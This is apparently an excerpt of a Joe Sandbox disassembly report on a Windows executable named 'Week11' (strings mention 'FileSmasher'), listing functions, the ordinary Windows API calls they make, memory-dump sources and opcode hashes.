                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$ClipDeleteRect$BrushCopyCreateFromGraphicsReset
                                • String ID:
                                • API String ID: 2296537269-0
                                • Opcode ID: 651bc4e712e5d57672b930c250f3e00eca8197ad4fceaa9a22bbc3aa95670b54
                                • Instruction ID: 9f69f649c0531c7d01d09b5a7e39bf7e1676fda4b2c47b955fa986feb152432a
                                • Opcode Fuzzy Hash: 651bc4e712e5d57672b930c250f3e00eca8197ad4fceaa9a22bbc3aa95670b54
                                • Instruction Fuzzy Hash: B6A14AB1A0121AEFDF14DF94D884AEEBBB5FF48314F54811EE905A7240DB38AD51CBA4
                                Function 004309B0 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 412filewindowCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNEL32(?,?,00000401,?,00000401), ref: 00430D25
                                • PostMessageW.USER32(?,00000401,00000000,00000000), ref: 00430E38
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DeleteFileMessagePost
                                • String ID: %p|%s|%u$T9N$disable_resize
                                • API String ID: 3800956871-1662393167
                                • Opcode ID: 1e32038507ba1feec5d02d36489da2690e7d91bd0bd9fe5c43df5f6d7e5b5a3e
                                • Instruction ID: b9b9ea4d7a6a2712e875ddc8091bfa44c6a79144ca5a17814dea005c11a588e5
                                • Opcode Fuzzy Hash: 1e32038507ba1feec5d02d36489da2690e7d91bd0bd9fe5c43df5f6d7e5b5a3e
                                • Instruction Fuzzy Hash: 42F189756043009FC714DF19C881A5BB7E5EF89324F148A5EF9999B352C738ED02CBAA
                                Function 004460A0 Relevance: 9.1, APIs: 6, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • CharNextW.USER32(?,00000000,00000000,?,?,?,00446A6D), ref: 004460DF
                                • CharNextW.USER32(00000000,?,00000000,00000000,?,?,?,00446A6D), ref: 004460F7
                                • CharNextW.USER32(00000000,?,00000000,00000000,?,?,?,00446A6D), ref: 00446110
                                • CharNextW.USER32(75A3A7D0,?,00000000,00000000,?,?,?,00446A6D), ref: 00446117
                                • CharNextW.USER32(00000000,?,00000000,00000000,?,?,?,00446A6D), ref: 00446171
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CharNext
                                • String ID:
                                • API String ID: 3213498283-0
                                • Opcode ID: a0189b3108c05be30ba86b9b69e67bae54b5a3f49c9514b0386e1d8119a55a9c
                                • Instruction ID: 37e5b94376f02e1ba7737fbb8c4a9f0002ba02506704fd020d02e49866831bab
                                • Opcode Fuzzy Hash: a0189b3108c05be30ba86b9b69e67bae54b5a3f49c9514b0386e1d8119a55a9c
                                • Instruction Fuzzy Hash: 4041EF312002128BE7249F38DC85577B3E5FF6A311BA5096ED889C3356EB39D881C79A
                                Function 00446B70 Relevance: 9.1, APIs: 6, Instructions: 122libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32 ref: 00446BDD
                                • FindResourceW.KERNEL32(00000000,?,?), ref: 00446BF8
                                • FreeLibrary.KERNEL32(00000000,?), ref: 00446CBD
                                  • Part of subcall function 00445320: GetLastError.KERNEL32(00443597), ref: 00445320
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Library$ErrorFindFreeLastLoadResource
                                • String ID:
                                • API String ID: 3418355812-0
                                • Opcode ID: 593e083c582287b0ec04c063ec813ce276290018c5cf64e7f4304d24288eadea
                                • Instruction ID: 52af52765b7018bd23f2b760989501530ca8233637e5d450e92807a3d993dcc8
                                • Opcode Fuzzy Hash: 593e083c582287b0ec04c063ec813ce276290018c5cf64e7f4304d24288eadea
                                • Instruction Fuzzy Hash: 4C41B1711087019BE324DF15D881A6BB7E8FB89758F41062FF88993251DB38DD05CAAF
                                Function 0042EA50 Relevance: 9.1, APIs: 6, Instructions: 120windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageWidth.GDIPLUS(448904C4,0042ECF2,00000000,?,?,?,0042ECF2,?), ref: 0042EA74
                                • GdipGetImageHeight.GDIPLUS(448904C4,?,448904C4,0042ECF2,00000000,?,?,?,0042ECF2,?), ref: 0042EA8B
                                • GdipAlloc.GDIPLUS(00000010,?,448904C4,?,448904C4,0042ECF2,00000000,?,?,?,0042ECF2,?), ref: 0042EA9A
                                • GdipCreateBitmapFromScan0.GDIPLUS(0042ECF2,?,00000000,0026200A,00000000,?,00000010,?,448904C4,?,448904C4,0042ECF2,00000000,?,?,?), ref: 0042EAC1
                                • GdipBitmapGetPixel.GDIPLUS(448904C4,00000000,00000000,?,0042ECF2,?,00000000,0026200A,00000000,?,00000010,?,448904C4,?,448904C4,0042ECF2), ref: 0042EAF4
                                • GdipBitmapSetPixel.GDIPLUS(?,00000000,00000000,FF000000,448904C4,00000000,00000000,?,0042ECF2,?,00000000,0026200A,00000000,?,00000010,?), ref: 0042EB3D
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Bitmap$ImagePixel$AllocCreateFromHeightScan0Width
                                • String ID:
                                • API String ID: 589066873-0
                                • Opcode ID: e733b6b687a4c5f3fea4d2c4b0e17155b2e366daab84b252ef7d41c16ad21c0b
                                • Instruction ID: 06c8f380e6a1397b3655f2985a67f7226a17fe18fdcafde15b48169c2821b68d
                                • Opcode Fuzzy Hash: e733b6b687a4c5f3fea4d2c4b0e17155b2e366daab84b252ef7d41c16ad21c0b
                                • Instruction Fuzzy Hash: AD31B371B00129AF9B10DF5AD881DAFBBB8FB85714B14819FF8099B205D234AD42CBA4
                                Function 00424A90 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreatePen1.GDIPLUS(?,?,00000000,00000000), ref: 00424ACC
                                • GdipSetPenDashOffset.GDIPLUS(00000000,?,?,?,00000000,00000000), ref: 00424AEE
                                • GdipSetPenDashStyle.GDIPLUS(00000000,00000001,00000000,?,?,?,00000000,00000000), ref: 00424B00
                                • GdipSetPenWidth.GDIPLUS(00000000,-00000001,?,?,00000000,00000000), ref: 00424B3C
                                • GdipDrawEllipseI.GDIPLUS(?,00000000,?,?,?,00000000,00000000,-00000001,?,?,00000000,00000000), ref: 00424B5D
                                • GdipDeletePen.GDIPLUS(00000000,?,00000000,?,?,?,00000000,00000000,-00000001,?,?,00000000,00000000), ref: 00424B6D
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Dash$CreateDeleteDrawEllipseOffsetPen1StyleWidth
                                • String ID:
                                • API String ID: 3835754423-0
                                • Opcode ID: bc5f782dc8e549d5fd057ac300281a0aebe9ca155e616210d25f95e4f6b985ba
                                • Instruction ID: 884cc54257c44e265a942f82c6f7be33afd1a3d1f8ecdfb0b82d9b1b9e82e48f
                                • Opcode Fuzzy Hash: bc5f782dc8e549d5fd057ac300281a0aebe9ca155e616210d25f95e4f6b985ba
                                • Instruction Fuzzy Hash: B8318675A04118AFDF18DFA9D884AAEBBB8EF84350F15815EF904E7240D738DD40CB64
                                Function 0043E180 Relevance: 9.1, APIs: 6, Instructions: 93COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 0043E1B6
                                • _memset.LIBCMT ref: 0043E1C9
                                • GetCurrentProcess.KERNEL32 ref: 0043E1FE
                                • _memset.LIBCMT ref: 0043E232
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0043E247
                                • WTSQuerySessionInformationW.WTSAPI32(00000000,000000FF,00000004,?,?), ref: 0043E270
                                  • Part of subcall function 0043DBB0: GetSystemDirectoryW.KERNEL32(?,00000103), ref: 0043DBBF
                                  • Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DA3B
                                  • Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%SystemDrive%,?,00000103), ref: 0043DA5A
                                  • Part of subcall function 0043D9F0: __wcsnicmp.LIBCMT ref: 0043DA75
                                  • Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DA9F
                                  • Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000103), ref: 0043DAB8
                                  • Part of subcall function 0043D9F0: __wcsicoll.LIBCMT ref: 0043DAC2
                                  • Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DADF
                                  • Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%,?,00000103), ref: 0043DAF8
                                  • Part of subcall function 0043D9F0: __wcsicoll.LIBCMT ref: 0043DB02
                                  • Part of subcall function 0043D9F0: _memset.LIBCMT ref: 0043DB1F
                                  • Part of subcall function 0043D9F0: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000103), ref: 0043DB38
                                  • Part of subcall function 0043D9F0: __wcsnicmp.LIBCMT ref: 0043DB5A
                                  • Part of subcall function 0043D9F0: __wcsicoll.LIBCMT ref: 0043DB73
                                  • Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(windir,?), ref: 0043DC3A
                                  • Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(SystemRoot,?), ref: 0043DC42
                                  • Part of subcall function 0043DC10: _memset.LIBCMT ref: 0043DC5A
                                  • Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(ComSpec,?), ref: 0043DD0A
                                  • Part of subcall function 0043DC10: SetEnvironmentVariableW.KERNEL32(SystemDrive,?), ref: 0043DD21
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Environment_memset$ExpandStringsVariable$__wcsicoll$__wcsnicmp$CurrentDirectoryFileInformationModuleNameProcessQuerySessionSystem
                                • String ID:
                                • API String ID: 3875749331-0
                                • Opcode ID: 60b10111db69f7b28c168dd6bc0877aae6462ec510c7536585a07ad56d65a0f0
                                • Instruction ID: efeaf43171ea69977cfcb36080cd1cd6059f6c5ca92097290a5c2233e868a2ad
                                • Opcode Fuzzy Hash: 60b10111db69f7b28c168dd6bc0877aae6462ec510c7536585a07ad56d65a0f0
                                • Instruction Fuzzy Hash: 43314B719012189ADB20EF519C45BEF73ADAF4C704F0011EEB904672C2DA795E95CB9D
                                Function 0047A200 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(1D1D1D8C), ref: 0047A228
                                • HeapLock.KERNEL32(00000000), ref: 0047A24E
                                • HeapWalk.KERNEL32(00000000,?), ref: 0047A268
                                • HeapWalk.KERNEL32(00000000,?), ref: 0047A29C
                                • HeapUnlock.KERNEL32(00000000), ref: 0047A2CF
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Heap$Walk$LockProcessUnlock
                                • String ID:
                                • API String ID: 2227978497-0
                                • Opcode ID: b186b2d2852414c0700dae0e564aef4e09316f9ac62cb7bd4439df536863820c
                                • Instruction ID: 30f15de8d54f4eeb7fec28a7866d4a092ff4021abed2c4903b3fa11efb473330
                                • Opcode Fuzzy Hash: b186b2d2852414c0700dae0e564aef4e09316f9ac62cb7bd4439df536863820c
                                • Instruction Fuzzy Hash: 8321E0751093419FD315CF28E884B9FB7E8EB85720F40863EF80192391D73A9849CBAB
                                Function 00460280 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 321threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 004602AB
                                • EnterCriticalSection.KERNEL32(?), ref: 004602BF
                                • LeaveCriticalSection.KERNEL32(?), ref: 004602D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CriticalSection$CurrentEnterLeaveThread
                                • String ID: FileSmasher\historydlg.xml$IDS_NO_DATA
                                • API String ID: 2351996187-3197532833
                                • Opcode ID: 4b360783dfd6be0138a405e2dc792872d13b4bf95278baa557200a02fe262fb7
                                • Instruction ID: 028c4074a9e95867e078abe2bb7ba8bf10d6841b7c620acf430e1bf6beca8d12
                                • Opcode Fuzzy Hash: 4b360783dfd6be0138a405e2dc792872d13b4bf95278baa557200a02fe262fb7
                                • Instruction Fuzzy Hash: AEB1A4712083419FE710DB65CC41B5B77E8AF89704F14461EFA45AB2C2DB78ED05CB9A
                                Function 004822CA Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowLongW.USER32(?,000000F0), ref: 004822FD
                                • GetParent.USER32(?), ref: 0048230B
                                • GetParent.USER32(?), ref: 0048231E
                                • GetLastActivePopup.USER32(?), ref: 0048232F
                                • IsWindowEnabled.USER32(?), ref: 00482343
                                • EnableWindow.USER32(?,00000000), ref: 00482356
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                • String ID:
                                • API String ID: 670545878-0
                                • Opcode ID: 73345cae9ea0cf933a0d12b9e84a3375943fbf52a1ba92b6db29bd6ac628cbf0
                                • Instruction ID: 9615c52491f184c7a1cfc2fb0684b042f474b33139c70dd3ec826485e9417237
                                • Opcode Fuzzy Hash: 73345cae9ea0cf933a0d12b9e84a3375943fbf52a1ba92b6db29bd6ac628cbf0
                                • Instruction Fuzzy Hash: 19118F32601221A7CB323A799B54B6F729C6F55B64F150A66ED04E7340DBBCCC0293AD
                                Function 004401E0 Relevance: 9.0, APIs: 6, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 004401E9
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004401F4
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440200
                                • ReleaseDC.USER32(00000000,00000000), ref: 0044020C
                                • MulDiv.KERNEL32(00000000,00000000,000009EC), ref: 00440224
                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00440235
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CapsDevice$Release
                                • String ID:
                                • API String ID: 1035833867-0
                                • Opcode ID: 7fce79aba2f8d0de5c00698e69a850d391c1119099c3b9e6a9e95ee31a69ccbd
                                • Instruction ID: 462b78027e15ed6f0a95b7f2c6649df6c4f76bdb0fb576b7a7b5105730ddadd1
                                • Opcode Fuzzy Hash: 7fce79aba2f8d0de5c00698e69a850d391c1119099c3b9e6a9e95ee31a69ccbd
                                • Instruction Fuzzy Hash: 45F01D75A41214BFE710EFA8DC4AE5E7FBCEB19712F004269FA04A7280DA709D04CFA5
                                Function 00440180 Relevance: 9.0, APIs: 6, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 00440189
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00440194
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004401A0
                                • ReleaseDC.USER32(00000000,00000000), ref: 004401AC
                                • MulDiv.KERNEL32(000009EC,?,?), ref: 004401C4
                                • MulDiv.KERNEL32(000009EC,?,?), ref: 004401D5
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CapsDevice$Release
                                • String ID:
                                • API String ID: 1035833867-0
                                • Opcode ID: 6c51284917fb886e15575db18ed4e44bbd2cfc635387cabda6c6f8100cfacc11
                                • Instruction ID: f3264cfd38ec8464efa8f621742a40a0c44e9e0a9f33fa74384ab9390e35c0af
                                • Opcode Fuzzy Hash: 6c51284917fb886e15575db18ed4e44bbd2cfc635387cabda6c6f8100cfacc11
                                • Instruction Fuzzy Hash: 42F01D75A41214BFE700EFA8DC4AF6E7BBCEB19712F004269FA0497280DAB05D04CFA5
                                Function 00488A6D Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memset
                                • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                • API String ID: 2102423945-1093365818
                                • Opcode ID: 0bdbb79d519032a05f2b834237b194c83b4aebc0740237cf020fc95c10db48cd
                                • Instruction ID: 8121904d660327dadd1f0a0572d98e94ea830a24abb3b80e07319e2636d3aee7
                                • Opcode Fuzzy Hash: 0bdbb79d519032a05f2b834237b194c83b4aebc0740237cf020fc95c10db48cd
                                • Instruction Fuzzy Hash: 0E9163B1C0021DAADB50EFD8C585BDEBBF8AF04344F50846EF908E6181DB78DA45D7A8
                                Function 00444A50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 190stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00444EA0: InitializeCriticalSection.KERNEL32(0000002C,1D1D1D8C,0000002C,00000000,00000000,000000FE), ref: 00444EDB
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00444BB6
                                  • Part of subcall function 00444F70: lstrlenW.KERNEL32(?,?,0044261D,00000000,00000001), ref: 00444F74
                                  • Part of subcall function 00444F70: _memcpy_s.LIBCMT ref: 00444F8B
                                • lstrlenW.KERNEL32(?), ref: 00444C37
                                  • Part of subcall function 00444E30: EnterCriticalSection.KERNEL32(004C17A0,00000000,?,00000000,00444B51), ref: 00444E3F
